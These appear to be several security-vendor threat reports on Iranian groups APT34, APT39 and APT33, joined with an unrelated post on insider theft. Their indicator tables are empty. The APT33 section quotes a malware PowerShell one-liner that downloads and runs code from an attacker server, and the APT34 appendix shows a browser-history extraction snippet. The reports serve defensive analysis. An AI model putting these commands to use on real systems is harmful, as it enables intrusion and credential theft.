APT34 is an Iran-nexus cluster of cyber espionage activity that has been active since at least 2014. They use a mix of public and non-public tools to collect strategic information that would benefit nation-state interests pertaining to geopolitical and economic needs. APT34 aligns with elements of activity reported as OilRig and Greenbug, by various security researchers. This threat group has conducted broad targeting across a variety of industries operating in the Middle East; however, we believe APT34's strongest interest is gaining access to financial, energy, and government entities.

Additional research on APT34 can be found in this FireEye blog post, this CERT-OPMD post, and this Cisco post.

Managed Defense also initiated a Community Protection Event (CPE) titled “Geopolitical Spotlight: Iran.” This CPE was created to ensure our customers are updated with new discoveries, activity and detection efforts related to this campaign, along with other recent activity from Iranian-nexus threat actors to include APT33, which is mentioned in this updated FireEye blog post.

Industries Targeted

The activities observed by Managed Defense, and described in this post, were primarily targeting the following industries:

  • Energy and Utilities
  • Government
  • Oil and Gas

Utilizing Cambridge University to Establish Trust

On June 19, 2019, FireEye’s Managed Defense Security Operations Center received an exploit detection alert on one of our FireEye Endpoint Security appliances. The offending application was identified as Microsoft Excel and was stopped immediately by FireEye Endpoint Security’s ExploitGuard engine. ExploitGuard is our behavioral monitoring, detection, and prevention capability that monitors application behavior, looking for various anomalies that threat actors use to subvert traditional detection mechanisms. Offending applications can subsequently be sandboxed or terminated, preventing an exploit from reaching its next programmed step.

The Managed Defense SOC analyzed the alert and identified a malicious file named System.doc (MD5: b338baa673ac007d7af54075ea69660b), located in C:\Users\<user_name>\.templates. The file System.doc is a Windows Portable Executable (PE), despite having a "doc" file extension. FireEye identified this new malware family as TONEDEAF.

A backdoor that communicates with a single command and control (C2) server using HTTP GET and POST requests, TONEDEAF supports collecting system information, uploading and downloading of files, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files – temp.txt and temp2.txt – within the same directory of its execution. We explore additional technical details of TONEDEAF in the malware appendix of this post.

Retracing the steps preceding exploit detection, FireEye identified that System.doc was dropped by a file named ERFT-Details.xls. Combining endpoint- and network-visibility, we were able to correlate that ERFT-Details.xls originated from the URL[.]com/Documents/ERFT-Details.xls. Network evidence also showed the access of a LinkedIn message directly preceding the spreadsheet download.

Managed Defense reached out to the impacted customer’s security team, who confirmed the file was received via a LinkedIn message. The targeted employee conversed with "Rebecca Watts", allegedly employed as "Research Staff at University of Cambridge". The conversation with Ms. Watts, provided in Figure 1, began with the solicitation of resumes for potential job opportunities.

Figure 1: Screenshot of LinkedIn message asking to download TONEDEAF

This is not the first time we’ve seen APT34 utilize academia and/or job offer conversations in their various campaigns. These conversations often take place on social media platforms, which can be an effective delivery mechanism if a targeted organization is focusing heavily on e-mail defenses to prevent intrusions.

FireEye examined the original file ERFT-Details.xls, which was observed with at least two unique MD5 file hashes:

  • 96feed478c347d4b95a8224de26a1b2c
  • caf418cbf6a9c4e93e79d4714d5d3b87

A snippet of the VBA code, provided in Figure 2, creates System.doc in the target directory from base64-encoded text upon opening.

Figure 2: Screenshot of VBA code from System.doc

The spreadsheet also creates a scheduled task named "windows update check" that runs the file C:\Users\<user_name>\.templates\System Manager.exe every minute. Upon closing the spreadsheet, a final VBA function will rename System.doc to System Manager.exe. Figure 3 provides a snippet of VBA code that creates the scheduled task, clearly obfuscated to avoid simple detection.

Figure 3: Additional VBA code from System.doc

Upon first execution of TONEDEAF, FireEye identified a callback to the C2 server offlineearthquake[.]com over port 80.

The FireEye Footprint: Pivots and Victim Identification

After identifying the usage of offlineearthquake[.]com as a potential C2 domain, FireEye’s Intelligence and Advanced Practices teams performed a wider search across our global visibility. FireEye’s Advanced Practices and Intelligence teams were able to identify additional artifacts and activity from the APT34 actors at other victim organizations. Of note, FireEye discovered two additional new malware families hosted at this domain, VALUEVAULT and LONGWATCH. We also identified a variant of PICKPOCKET, a browser credential-theft tool FireEye has been tracking since May 2018, hosted on the C2.

Requests to the domain offlineearthquake[.]com could take multiple forms, depending on the malware’s stage of installation and purpose. Additionally, during installation, the malware retrieves the system and current user names, which are used to create a three-character “sys_id”. This value is used in subsequent requests, likely to track infected target activity. URLs were observed with the following structures:

  • hxxp[://]offlineearthquake[.]com/download?id=<sys_id>&n=000
  • hxxp[://]offlineearthquake[.]com/upload?id=<sys_id>&n=000
  • hxxp[://]offlineearthquake[.]com/file/<sys_id>/<executable>?id=<cmd_id>&h=000
  • hxxp[://]offlineearthquake[.]com/file/<sys_id>/<executable>?id=<cmd_id>&n=000

The first executable identified by FireEye on the C2 was WinNTProgram.exe (MD5: 021a0f57fe09116a43c27e5133a57a0a), identified by FireEye as LONGWATCH. LONGWATCH is a keylogger that outputs keystrokes to a log.txt file in the Window’s temp folder. Further information regarding LONGWATCH is detailed in the Malware Appendix section at the end of the post.

FireEye Network Security appliances also detected the following being retrieved from APT34 infrastructure (Figure 4).

GET hxxp://<sys_id>/b.exe?id=<3char_redacted>&n=000
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0)
AppleWebKit/537.36 (KHTML, like Gecko)
Host: offlineearthquake[.]com
Proxy-Connection: Keep-Alive Pragma: no-cache HTTP/1.1

Figure 4: Snippet of HTTP traffic retrieving VALUEVAULT; detected by FireEye Network Security appliance

FireEye identifies b.exe (MD5: 9fff498b78d9498b33e08b892148135f) as VALUEVAULT.

VALUEVAULT is a Golang compiled version of the "Windows Vault Password Dumper" browser credential theft tool from Massimiliano Montoro, the developer of Cain & Abel.

VALUEVAULT maintains the same functionality as the original tool by allowing the operator to extract and view the credentials stored in the Windows Vault. Additionally, VALUEVAULT will call Windows PowerShell to extract browser history in order to match browser passwords with visited sites. Further information regarding VALUEVAULT can be found in the appendix below.

Further pivoting from FireEye appliances and internal data sources yielded two additional files, PE86.dll (MD5: d8abe843db508048b4d4db748f92a103) and PE64.dll (MD5: 6eca9c2b7cf12c247032aae28419319e). These files were analyzed and determined to be 64- and 32-bit variants of the malware PICKPOCKET, respectively.

PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed during a Mandiant incident response in 2018 and, to date, solely utilized by APT34.


The activity described in this blog post presented a well-known Iranian threat actor utilizing their tried-and-true techniques to breach targeted organizations. Luckily, with FireEye’s platform in place, our Managed Defense customers were not impacted. Furthermore, upon the blocking of this activity, FireEye was able to expand upon the observed indicators to identify a broader campaign, as well as the use of new and old malware.

We suspect this will not be the last time APT34 brings new tools to the table. Threat actors are often reshaping their TTPs to evade detection mechanisms, especially if the target is highly desired. For these reasons, we recommend organizations remain vigilant in their defenses, and remember to view their environment holistically when it comes to information security.

Malware Appendix


TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. Although this backdoor was coded to be able to communicate with DNS requests to the hard-coded Command and Control server, c[.]cdn-edge-akamai[.]com, it was not configured to use this functionality. Figure 5 provides a snippet of the assembly CALL instruction of dns_exfil. The creator likely made this as a means for future DNS exfiltration as a plan B.

Figure 5: Snippet of code from TONEDEAF binary

Aside from not being enabled in this sample, the DNS tunneling functionality also contains missing values and bugs that prevent it from executing properly. One such bug involves determining the length of a command response string without accounting for Unicode strings. As a result, a single command response byte is sent when, for example, the malware executes a shell command that returns Unicode output. Additionally, within the malware, an unused string contained the address 185[.]15[.]247[.]154.


VALUEVAULT is a Golang compiled version of the “Windows Vault Password Dumper” browser credential theft tool from Massimiliano Montoro, the developer of Cain & Abel.

VALUEVAULT maintains the same functionality as the original tool by allowing the operator to extract and view the credentials stored in the Windows Vault. Additionally, VALUEVAULT will call Windows PowerShell to extract browser history in order to match browser passwords with visited sites. A snippet of this function is shown in Figure 6.

powershell.exe /c "function get-iehistory {. [CmdletBinding()]. param (). . $shell = New-Object -ComObject Shell.Application. $hist = $shell.NameSpace(34). $folder = $hist.Self. . $hist.Items() | . foreach {. if ($_.IsFolder) {. $siteFolder = $_.GetFolder. $siteFolder.Items() | . foreach {. $site = $_. . if ($site.IsFolder) {. $pageFolder = $site.GetFolder. $pageFolder.Items() | . foreach {. $visit = New-Object -TypeName PSObject -Property @{ . URL = $($pageFolder.GetDetailsOf($_,0)) . }. $visit. }. }. }. }. }. }. get-iehistory

Figure 6: Snippet of PowerShell code from VALUEVAULT to extract browser credentials

Upon execution, VALUEVAULT creates a SQLITE database file in the AppData\Roaming directory under the context of the user account it was executed by. This file is named fsociety.dat and VALUEVAULT will write the dumped passwords to this in SQL format. This functionality is not in the original version of the “Windows Vault Password Dumper”. Figure 7 shows the SQL format of the fsociety.dat file.

Figure 7: SQL format of the VALUEVAULT fsociety.dat SQLite database

VALUEVAULT’s function names are not obfuscated and are directly reviewable in strings analysis. Other developer environment variables were directly available within the binary as shown below. VALUEVAULT does not possess the ability to perform network communication, meaning the operators would need to manually retrieve the captured output of the tool.

C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/Chrome Password Recovery.go

Figure 8: Golang files extracted during execution of VALUEVAULT


FireEye identified the binary WinNTProgram.exe (MD5:021a0f57fe09116a43c27e5133a57a0a) hosted on the malicious domain offlineearthquake[.]com. FireEye identifies this malware as LONGWATCH. The primary function of LONGWATCH is a keylogger that outputs keystrokes to a log.txt file in the Windows temp folder.

Interesting strings identified in the binary are shown in Figure 9.

[PRINT SCREEN] (1 space)
\n\n >>>  (2 spaces)

Figure 9: Strings identified in a LONGWATCH binary

Detecting the Techniques

FireEye detects this activity across our platforms, including named detection for TONEDEAF, VALUEVAULT, and LONGWATCH. Table 2 contains several specific detection names that provide an indication of APT34 activity.

Signature Name










Table 1: FireEye Platform Detections

Endpoint Indicators


MD5 Hash (if applicable)

Code Family

























Table 2: APT34 Endpoint Indicators from this blog post

Network Indicators






A huge thanks to Delyan Vasilev and Alex Lanstein for their efforts in detecting, analyzing and classifying this APT34 campaign. Thanks to Matt Williams, Carlos Garcia and Matt Haigh from the FLARE team for the in-depth malware analysis.

Forcing the Adversary to Pursue Insider Theft

Jack Crook pointed me toward a story by Christopher Burgess about intellectual property theft by "Hongjin Tan, a 35 year old Chinese national and U.S. legal permanent resident... [who] was arrested on December 20 and charged with theft of trade secrets. Tan is alleged to have stolen the trade secrets from his employer, a U.S. petroleum company," according to the criminal complaint filed by the US DoJ.

Tan's former employer and the FBI allege that Tan "downloaded restricted files to a personal thumb drive." I could not tell from the complaint if Tan downloaded the files at work or at home, but the thumb drive ended up at Tan's home. His employer asked Tan to bring it to their office, which Tan did. However, he had deleted all the files from the drive. Tan's employer recovered the files using commercially available forensic software.

This incident, by definition, involves an "insider threat." Tan was an employee who appears to have copied information that was outside the scope of his work responsibilities, resigned from his employer, and was planning to return to China to work for a competitor, having delivered his former employer's intellectual property.

When I started GE-CIRT in 2008 (officially "initial operating capability" on 1 January 2009), one of the strategies we pursued involved insider threats. I've written about insiders on this blog before but I couldn't find a description of the strategy we implemented via GE-CIRT.

We sought to make digital intrusions more expensive than physical intrusions.

In other words, we wanted to make it easier for the adversary to accomplish his mission using insiders. We wanted to make it more difficult for the adversary to accomplish his mission using our network.

In a cynical sense, this makes security someone else's problem. Suddenly the physical security team is dealing with the worst of the worst!

This is a win for everyone, however. Consider the many advantages the physical security team has over the digital security team.

The physical security team can work with human resources during the hiring process. HR can run background checks and identify suspicious job applicants prior to granting employment and access.

Employees are far more exposed than remote intruders. Employees, even under cover, expose their appearance, likely residence, and personalities to the company and its workers.

Employees can be subject to far more intensive monitoring than remote intruders. Employee endpoints can be instrumented. Employee workspaces are instrumented via access cards, cameras at entry and exit points, and other measures.

Employers can cooperate with law enforcement to investigate and prosecute employees. They can control and deter theft and other activities.

In brief, insider theft, like all "close access" activities, is incredibly risky for the adversary. It is a win for everyone when the adversary must resort to using insiders to accomplish their mission. Digital and physical security must cooperate to leverage these advantages, while collaborating with human resources, legal, information technology, and business lines to wring the maximum results from this advantage.

APT39: An Iranian Cyber Espionage Group Focused on Personal Information

UPDATE (Jan. 30): Figure 1 has been updated to more accurately reflect APT39 targeting. Specifically, Australia, Norway and South Korea have been removed.

In December 2018, FireEye identified APT39 as an Iranian cyber espionage group responsible for widespread theft of personal information. We have tracked activity linked to this group since November 2014 in order to protect organizations from APT39 activity to date. APT39’s focus on the widespread theft of personal information sets it apart from other Iranian groups FireEye tracks, which have been linked to influence operations, disruptive attacks, and other threats. APT39 likely focuses on personal information to support monitoring, tracking, or surveillance operations that serve Iran’s national priorities, or potentially to create additional accesses and vectors to facilitate future campaigns. 

APT39 was created to bring together previous activities and methods used by this actor, and its activities largely align with a group publicly referred to as "Chafer." However, there are differences in what has been publicly reported due to the variances in how organizations track activity. APT39 primarily leverages the SEAWEED and CACHEMONEY backdoors along with a specific variant of the POWBAT backdoor. While APT39's targeting scope is global, its activities are concentrated in the Middle East. APT39 has prioritized the telecommunications sector, with additional targeting of the travel industry and IT firms that support it and the high-tech industry. The countries and industries targeted by APT39 are depicted in Figure 1.

Figure 1: Countries and industries targeted by APT39

Operational Intent

APT39's focus on the telecommunications and travel industries suggests intent to perform monitoring, tracking, or surveillance operations against specific individuals, collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities, or create additional accesses and vectors to facilitate future campaigns. Government entities targeting suggests a potential secondary intent to collect geopolitical data that may benefit nation-state decision making. Targeting data supports the belief that APT39's key mission is to track or monitor targets of interest, collect personal information, including travel itineraries, and gather customer data from telecommunications firms.

Iran Nexus Indicators

We have moderate confidence APT39 operations are conducted in support of Iranian national interests based on regional targeting patterns focused in the Middle East, infrastructure, timing, and similarities to APT34, a group that loosely aligns with activity publicly reported as “OilRig”. While APT39 and APT34 share some similarities, including malware distribution methods, POWBAT backdoor use, infrastructure nomenclature, and targeting overlaps, we consider APT39 to be distinct from APT34 given its use of a different POWBAT variant. It is possible that these groups work together or share resources at some level.

Attack Lifecycle

APT39 uses a variety of custom and publicly available malware and tools at all stages of the attack lifecycle.

Initial Compromise

For initial compromise, FireEye Intelligence has observed APT39 leverage spear phishing emails with malicious attachments and/or hyperlinks typically resulting in a POWBAT infection. APT39 frequently registers and leverages domains that masquerade as legitimate web services and organizations that are relevant to the intended target. Furthermore, this group has routinely identified and exploited vulnerable web servers of targeted organizations to install web shells, such as ANTAK and ASPXSPY, and used stolen legitimate credentials to compromise externally facing Outlook Web Access (OWA) resources.

Establish Foothold, Escalate Privileges, and Internal Reconnaissance

Post-compromise, APT39 leverages custom backdoors such as SEAWEED, CACHEMONEY, and a unique variant of POWBAT to establish a foothold in a target environment. During privilege escalation, freely available tools such as Mimikatz and Ncrack have been observed, in addition to legitimate tools such as Windows Credential Editor and ProcDump. Internal reconnaissance has been performed using custom scripts and both freely available and custom tools such as the port scanner, BLUETORCH.

Lateral Movement, Maintain Presence, and Complete Mission

APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol (RDP), Secure Shell (SSH), PsExec, RemCom, and xCmdSvc. Custom tools such as REDTRIP, PINKTRIP, and BLUETRIP have also been used to create SOCKS5 proxies between infected hosts. In addition to using RDP for lateral movement, APT39 has used this protocol to maintain persistence in a victim environment. To complete its mission, APT39 typically archives stolen data with compression tools such as WinRAR or 7-Zip.

Figure 2: APT39 attack lifecycle

There are some indications that APT39 demonstrated a penchant for operational security to bypass detection efforts by network defenders, including the use of a modified version of Mimikatz that was repacked to thwart anti-virus detection in one case, as well as another instance when after gaining initial access APT39 performed credential harvesting outside of a compromised entity's environment to avoid detection.


We believe APT39's significant targeting of the telecommunications and travel industries reflects efforts to collect personal information on targets of interest and customer data for the purposes of surveillance to facilitate future operations. Telecommunications firms are attractive targets given that they store large amounts of personal and customer information, provide access to critical infrastructure used for communications, and enable access to a wide range of potential targets across multiple verticals. APT39's targeting not only represents a threat to known targeted industries, but it extends to these organizations' clientele, which includes a wide variety of sectors and individuals on a global scale. APT39's activity showcases Iran's potential global operational reach and how it uses cyber operations as a low-cost and effective tool to facilitate the collection of key data on perceived national security threats and gain advantages against regional and global rivals.

OVERRULED: Containing a Potentially Destructive Adversary


FireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. Public reporting indicates this activity may be related to recent destructive attacks. FireEye's Managed Defense has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection.

On Sept. 20, 2017, FireEye Intelligence published a blog post detailing spear phishing activity targeting Energy and Aerospace industries. Recent public reporting indicated possible links between the confirmed APT33 spear phishing and destructive SHAMOON attacks; however, we were unable to independently verify this claim. FireEye’s Advanced Practices team leverages telemetry and aggressive proactive operations to maintain visibility of APT33 and their attempted intrusions against our customers. These efforts enabled us to establish an operational timeline that was consistent with multiple intrusions Managed Defense identified and contained prior to the actor completing their mission. We correlated the intrusions using an internally-developed similarity engine described below. Additionally, public discussions have also indicated that specific attacker infrastructure we observed is possibly related to the recent destructive SHAMOON attacks.

Identifying the Overlap in Threat Activity

FireEye augments our expertise with an internally-developed similarity engine to evaluate potential associations and relationships between groups and activity. Using concepts from document clustering and topic modeling literature, this engine provides a framework to calculate and discover similarities between groups of activities, and then develop investigative leads for follow-on analysis. Our engine identified similarities between a series of intrusions within the engineering industry. The near real-time results led to an in-depth comparative analysis. FireEye analyzed all available organic information from numerous intrusions and all known APT33 activity. We subsequently concluded, with medium confidence, that two specific early-phase intrusions were the work of a single group. Advanced Practices then reconstructed an operational timeline based on confirmed APT33 activity observed in the last year. We compared that to the timeline of the contained intrusions and determined there were circumstantial overlaps to include remarkable similarities in tool selection during specified timeframes. We assess with low confidence that the intrusions were conducted by APT33. This blog contains original source material only, whereas Finished Intelligence including an all-source analysis is available within our intelligence portal. To best understand the techniques employed by the adversary, it is necessary to provide background on our Managed Defense response to this activity during their 24x7 monitoring.

Managed Defense Rapid Responses: Investigating the Attacker

In mid-November 2017, Managed Defense identified and responded to targeted threat activity at a customer within the engineering industry. The adversary leveraged stolen credentials and a publicly available tool, SensePost’s RULER, to configure a client-side mail rule crafted to download and execute a malicious payload from an adversary-controlled WebDAV server 85.206.161[.]214@443\outlook\live.exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f).

The payload was an AutoIT downloader that retrieved and executed additional PowerShell from hxxps://85.206.161[.]216:8080/HomePage.htm. The follow-on PowerShell profiled the target system’s architecture, downloaded the appropriate variant of PowerSploit (MD5: c326f156657d1c41a9c387415bf779d4 or 0564706ec38d15e981f71eaf474d0ab8), and reflectively loaded PUPYRAT (MD5: 94cd86a0a4d747472c2b3f1bc3279d77 or 17587668AC577FCE0B278420B8EB72AC). The actor leveraged a publicly available exploit for CVE-2017-0213 to escalate privileges, publicly available Windows SysInternals PROCDUMP to dump the LSASS process, and publicly available MIMIKATZ to presumably steal additional credentials. Managed Defense aided the victim in containing the intrusion.

FireEye collected 168 PUPYRAT samples for a comparison. While import hashes (IMPHASH) are insufficient for attribution, we found it remarkable that out of the specified sampling, the actor’s IMPHASH was found in only six samples, two of which were confirmed to belong to the threat actor observed in Managed Defense, and one which is attributed to APT33. We also determined APT33 likely transitioned from PowerShell EMPIRE to PUPYRAT during this timeframe.

In mid-July of 2018, Managed Defense identified similar targeted threat activity focused against the same industry. The actor leveraged stolen credentials and RULER’s module that exploits CVE-2017-11774 (RULER.HOMEPAGE), modifying numerous users’ Outlook client homepages for code execution and persistence. These methods are further explored in this post in the "RULER In-The-Wild" section.

The actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available .NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Managed Defense rapidly engaged and successfully contained the intrusion. Of note, Advanced Practices separately established that APT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018.

During the July activity, Managed Defense observed three variations of the homepage exploit hosted at hxxp://91.235.116[.]212/index.html. One example is shown in Figure 1.

Figure 1: Attacker’s homepage exploit (CVE-2017-11774)

The main encoded payload within each exploit leveraged WMIC to conduct system profiling in order to determine the appropriate OS-dependent POSHC2 implant and dropped to disk a PowerShell script named “Media.ps1” within the user’s %LOCALAPPDATA% directory (%LOCALAPPDATA%\MediaWs\Media.ps1) as shown in Figure 2.

Figure 2: Attacker’s “Media.ps1” script

The purpose of “Media.ps1” was to decode and execute the downloaded binary payload, which was written to disk as “C:\Users\Public\Downloads\log.dat”. At a later stage, this PowerShell script would be configured to persist on the host via a registry Run key.

Analysis of the “log.dat” payloads determined them to be variants of the publicly available POSHC2 proxy-aware stager written to download and execute PowerShell payloads from a hardcoded command and control (C2) address. These particular POSHC2 samples run on the .NET framework and dynamically load payloads from Base64 encoded strings. The implant will send a reconnaissance report via HTTP to the C2 server (hxxps://51.254.71[.]223/images/static/content/) and subsequently evaluate the response as PowerShell source code. The reconnaissance report contains the following information:

  • Username and domain
  • Computer name
  • CPU details
  • Current exe PID
  • Configured C2 server

The C2 messages are encrypted via AES using a hardcoded key and encoded with Base64. It is this POSHC2 binary that established persistence for the aforementioned “Media.ps1” PowerShell script, which then decodes and executes the POSHC2 binary upon system startup. During the identified July 2018 activity, the POSHC2 variants were configured with a kill date of July 29, 2018.

POSHC2 was leveraged to download and execute a new PowerShell-based implant self-named POWERTON (hxxps://185.161.209[.]172/api/info). The adversary had limited success with interacting with POWERTON during this time.  The actor was able to download and establish persistence for an AutoIt binary named “ClouldPackage.exe” (MD5: 46038aa5b21b940099b0db413fa62687), which was achieved via the POWERTON “persist” command. The sole functionality of “ClouldPackage.exe” was to execute the following line of PowerShell code:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; $webclient = new-object System.Net.WebClient; $webclient.Credentials = new-object System.Net.NetworkCredential('public', 'fN^4zJp{5w#K0VUm}Z_a!QXr*]&2j8Ye'); iex $webclient.DownloadString('hxxps://185.161.209[.]172/api/default')

The purpose of this code is to retrieve “silent mode” POWERTON from the C2 server. Note the actor protected their follow-on payloads with strong credentials. Shortly after this, Managed Defense contained the intrusion.

Starting approximately three weeks later, the actor reestablished access through a successful password spray. Managed Defense immediately identified the actor deploying malicious homepages with RULER to persist on workstations. They made some infrastructure and tooling changes to include additional layers of obfuscation in an attempt to avoid detection. The actor hosted their homepage exploit at a new C2 server (hxxp://5.79.66[.]241/index.html). At least three new variations of “index.html” were identified during this period. Two of these variations contained encoded PowerShell code written to download new OS-dependent variants of the .NET POSHC2 binaries, as seen in Figure 3.

Figure 3: OS-specific POSHC2 Downloader

Figure 3 shows that the actor made some minor changes, such as encoding the PowerShell "DownloadString" commands and renaming the resulting POSHC2 and .ps1 files dropped to disk. Once decoded, the commands will attempt to download the POSHC2 binaries from yet another new C2 server (hxxp://103.236.149[.]124/delivered.dat). The name of the .ps1 file dropped to decode and execute the POSHC2 variant also changed to “Vision.ps1”.  During this August 2018 activity, the POSHC2 variants were configured with a “kill date” of Aug. 13, 2018. Note that POSHC2 supports a kill date in order to guardrail an intrusion by time and this functionality is built into the framework.

Once again, POSHC2 was used to download a new variant of POWERTON (MD5: c38069d0bc79acdc28af3820c1123e53), configured to communicate with the C2 domain hxxps://basepack[.]org. At one point in late-August, after the POSHC2 kill date, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages previously observed.

Due to Managed Defense’s early containment of these intrusions, we were unable to ascertain the actor’s motivations; however, it was clear they were adamant about gaining and maintaining access to the victim’s network.

Adversary Pursuit: Infrastructure Monitoring

Advanced Practices conducts aggressive proactive operations in order to identify and monitor adversary infrastructure at scale. The adversary maintained a RULER.HOMEPAGE payload at hxxp://91.235.116[.]212/index.html between July 16 and Oct. 11, 2018. On at least Oct. 11, 2018, the adversary changed the payload (MD5: 8be06571e915ae3f76901d52068e3498) to download and execute a POWERTON sample from hxxps://103.236.149[.]100/api/info (MD5: 4047e238bbcec147f8b97d849ef40ce5). This specific URL was identified in a public discussion as possibly related to recent destructive attacks. We are unable to independently verify this correlation with any organic information we possess.

On Dec. 13, 2018, Advanced Practices proactively identified and attributed a malicious RULER.HOMEPAGE payload hosted at hxxp://89.45.35[.]235/index.html (MD5: f0fe6e9dde998907af76d91ba8f68a05). The payload was crafted to download and execute POWERTON hosted at hxxps://staffmusic[.]org/transfer/view (MD5: 53ae59ed03fa5df3bf738bc0775a91d9).

Table 1 contains the operational timeline for the activity we analyzed.




2017-08-15 17:06:59

APT33 – EMPIRE (Used)


2017-09-15 16:49:59

APT33 – PUPYRAT (Compiled)


2017-11-12 20:42:43

GroupA – AUT2EXE Downloader (Compiled)


2017-11-14 14:55:14

GroupA – PUPYRAT (Used)


2018-01-09 19:15:16

APT33 – PUPYRAT (Compiled)


2018-02-13 13:35:06

APT33 – PUPYRAT (Used)


2018-05-09 18:28:43

GroupB – AUT2EXE (Compiled)


2018-07-02 07:57:40

APT33 – POSHC2 (Used)


2018-07-16 00:33:01

GroupB – POSHC2 (Compiled)


2018-07-16 01:39:58

GroupB – POSHC2 (Used)


2018-07-16 08:36:13

GroupB – POWERTON (Used)


2018-07-31 22:09:25

APT33 – POSHC2 (Used)


2018-08-06 16:27:05

GroupB – POSHC2 (Compiled)


2018-08-07 05:10:05

GroupB – POSHC2 (Used)


2018-08-29 18:14:18

APT33 – POSHC2 (Used)


2018-10-09 16:02:55

APT33 – POSHC2 (Used)


2018-10-09 16:48:09

APT33 – POSHC2 (Used)


2018-10-11 21:29:22

GroupB – POWERTON (Used)


2018-12-13 11:00:00

GroupB – POWERTON (Identified)


Table 1: Operational Timeline

Outlook and Implications

If the activities observed during these intrusions are linked to APT33, it would suggest that APT33 has likely maintained proprietary capabilities we had not previously observed until sustained pressure from Managed Defense forced their use. FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. This risk is pronounced in the energy sector, which we consistently observe them target. That targeting aligns with Iranian national priorities for economic growth and competitive advantage, especially relating to petrochemical production.

We will continue to track these clusters independently until we achieve high confidence that they are the same. The operators behind each of the described intrusions are using publicly available but not widely understood tools and techniques in addition to proprietary implants as needed. Managed Defense has the privilege of being exposed to intrusion activity every day across a wide spectrum of industries and adversaries. This daily front line experience is backed by Advanced Practices, FireEye Labs Advanced Reverse Engineering (FLARE), and FireEye Intelligence to give our clients every advantage they can have against sophisticated adversaries. We welcome additional original source information we can evaluate to confirm or refute our analytical judgements on attribution.

Custom Backdoor: POWERTON

POWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. POWERTON is designed to support multiple persistence mechanisms, including WMI and auto-run registry key. Communications with the C2 are over TCP/HTTP(S) and leverage AES encryption for communication traffic to and from the C2. POWERTON typically gets deployed as a later stage backdoor and is obfuscated several layers.

FireEye has witnessed at least two separate versions of POWERTON, tracked separately as POWERTON.v1 and POWERTON.v2, wherein the latter has improved its command and control functionality, and integrated the ability to dump password hashes.

Table 2 contains samples of POWERTON.

Hash of Obfuscated File (MD5)

Hash of Deobfuscated File (MD5)























Table 2: POWERTON malware samples

Adversary Methods: Email Exploitation on the Rise

Outlook and Exchange are ubiquitous with the concept of email access. User convenience is a primary driver behind technological advancements, but convenient access for users often reveals additional attack surface for adversaries. As organizations expose any email server access to the public internet for its users, those systems become intrusion vectors. FireEye has observed an increase in targeted adversaries challenging and subverting security controls on Exchange and Office365. Our Mandiant consultants also presented several new methods used by adversaries to subvert multifactor authentication at FireEye Cyber Defense Summit 2018.

At FireEye, our decisions are data driven, but data provided to us is often incomplete and missing pieces must be inferred based on our expertise in order for us to respond to intrusions effectively. A plausible scenario for exploitation of this vector is as follows.

An adversary has a single pair of valid credentials for a user within your organization obtained through any means, to include the following non-exhaustive examples:

  • Third party breaches where your users have re-used credentials; does your enterprise leverage a naming standard for email addresses such as first.last@yourorganization.tld? It is possible that a user within your organization has a personal email address with a first and last name--and an affiliated password--compromised in a third-party breach somewhere. Did they re-use that password?
  • Previous compromise within your organization where credentials were compromised but not identified or reset.
  • Poor password choice or password security policies resulting in brute-forced credentials.
  • Gathering of crackable password hashes from various other sources, such as NTLM hashes gathered via documents intended to phish them from users.
  • Credential harvesting phishing scams, where harvested credentials may be sold, re-used, or documented permanently elsewhere on the internet.

Once the adversary has legitimate credentials, they identify publicly accessible Outlook Web Access (OWA) or Office 365 that is not protected with multi-factor authentication. The adversary leverages the stolen credentials and a tool like RULER to deliver exploits through Exchange’s legitimate features.

RULER In-The-Wild: Here, There, and Everywhere

SensePost’s RULER is a tool designed to interact with Exchange servers via a messaging application programming interface (MAPI), or via remote procedure calls (RPC), both over HTTP protocol. As detailed in the "Managed Defense Rapid Responses" section, in mid-November 2017, FireEye witnessed network activity generated by an existing Outlook email client process on a single host, indicating connection via Web Distributed Authoring and Versioning (WebDAV) to an adversary-controlled IP address 85.206.161[.]214. This communication retrieved an executable created with Aut2Exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f), and executed a PowerShell one-liner to retrieve further malicious content.

Without the requisite logging from the impacted mailbox, we can still assess that this activity was the result of a malicious mail rule created using the aforementioned tooling for the following reasons:

  • Outlook.exe directly requested the malicious executable hosted at the adversary IP address over WebDAV. This is unexpected unless some feature of Outlook directly was exploited; traditional vectors like phishing would show a process ancestry where Outlook spawned a child process of an Office product, Acrobat, or something similar. Process injection would imply prior malicious code execution on the host, which evidence did not support.
  • The transfer of 95f3bea43338addc1ad951cd2d42eb6f was over WebDAV. RULER facilitates this by exposing a simple WebDAV server, and a command line module for creating a client-side mail rule to point at that WebDAV hosted payload.
  • The choice of WebDAV for this initial transfer of stager is the result of restrictions in mail rule creation; the payload must be "locally" accessible before the rule can be saved, meaning protocol handlers for something like HTTP or FTP are not permitted. This is thoroughly detailed in Silent Break Security's initial write-up prior to RULER’s creation. This leaves SMB and WebDAV via UNC file pathing as the available options for transferring your malicious payload via an Outlook Rule. WebDAV is likely the less alerting option from a networking perspective, as one is more likely to find WebDAV transactions occurring over ports 80 and 443 to the internet than they are to find a domain joined host communicating via SMB to a non-domain joined host at an arbitrary IP address.
